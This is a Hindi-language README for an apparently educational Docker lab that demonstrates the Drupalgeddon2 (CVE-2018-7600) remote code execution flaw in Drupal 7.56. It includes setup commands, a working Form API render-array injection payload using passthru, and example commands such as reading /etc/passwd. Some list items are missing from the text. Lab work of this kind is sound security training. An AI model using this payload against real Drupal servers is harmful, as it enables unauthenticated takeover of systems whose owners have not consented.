
CVE-2018-7600 (Drupalgeddon2) रिमोट कोड एक्ज़ीक्यूशन को प्रदर्शित करने वाली शैक्षिक प्रयोगशाला, जो Docker-आधारित असुरक्षित Drupal 7.56 वातावरण का उपयोग करती है।
शैक्षिक प्रयोगशाला, जो Docker के साथ तैनात एक कमजोर Drupal 7.56 वातावरण का उपयोग करके CVE-2018-7600 (Drupalgeddon2) के शोषण को प्रदर्शित करती है।
यह प्रोजेक्ट वास्तविक दुनिया की भेद्यता मूल्यांकन कार्यप्रवाह का अनुकरण करता है, जिसमें शामिल हैं:
CVE-2018-7600 (Drupalgeddon2) Drupal CMS में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है।
यह समस्या Drupal के Form API में मौजूद है, जहाँ उपयोगकर्ता-नियंत्रित इनपुट को रेंडर ऐरे के रूप में व्याख्यायित किया जा सकता है, जिससे हमलावर निम्नलिखित दुर्भावनापूर्ण कॉलबैक इंजेक्ट कर सकते हैं:
यह सर्वर पर बिना प्रमाणीकरण के कमांड निष्पादन को जन्म देता है।
Attacker (Kali Linux)
|
| HTTP Requests
v
Drupal 7.56 (Vulnerable)
|
v
MySQL Database
cve-2018-7600-drupalgeddon2-lab
│
├── README.md
├── setup.md
├── scan.py
├── exploit.py
│
├── lab-setup/
│ └── docker-compose.yml
│
├── screenshots/
│ ├── drupal-dashboard.png
│ ├── drupal-version.png
│ └── rce-output.png
│
├── logs/
│ ├── scan_results.txt
│ └── exploit_log.txt
│
├── payloads/
│ └── payload-list.txt
│
├── report/
│ └── drupalgeddon2-report.pdf


git clone https://github.com/Meraj1312/cve-2018-7600-drupalgeddon2-lab.git
cd cve-2018-7600-drupalgeddon2-lab
docker compose up -d
http://localhost:8080
python3 scan.py http://localhost:8080
उदाहरण आउटपुट:
[~] Scanning http://localhost:8080... VULNERABLE
python3 exploit.py http://localhost:8080 id
उदाहरण आउटपुट:
uid=33(www-data) gid=33(www-data)
प्रयुक्त मूल पेलोड संरचना:
name[#post_render][]=passthru
name[#type]=markup
name[#markup]=whoami
उदाहरण कमांड:
whoami
id
cat /etc/passwd
पूर्ण पेलोड सूची यहाँ उपलब्ध है:
payloads/payload-list.txt
एक स्वच्छ और पेशेवर रिपॉजिटरी संरचना बनाए रखने के लिए:
यह पृथक्करण सुनिश्चित करता है:
यह प्रयोगशाला निम्नलिखित के लिए है:
यह प्रोजेक्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है।
स्पष्ट प्राधिकरण के बिना सिस्टम का शोषण करने का प्रयास न करें।
लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।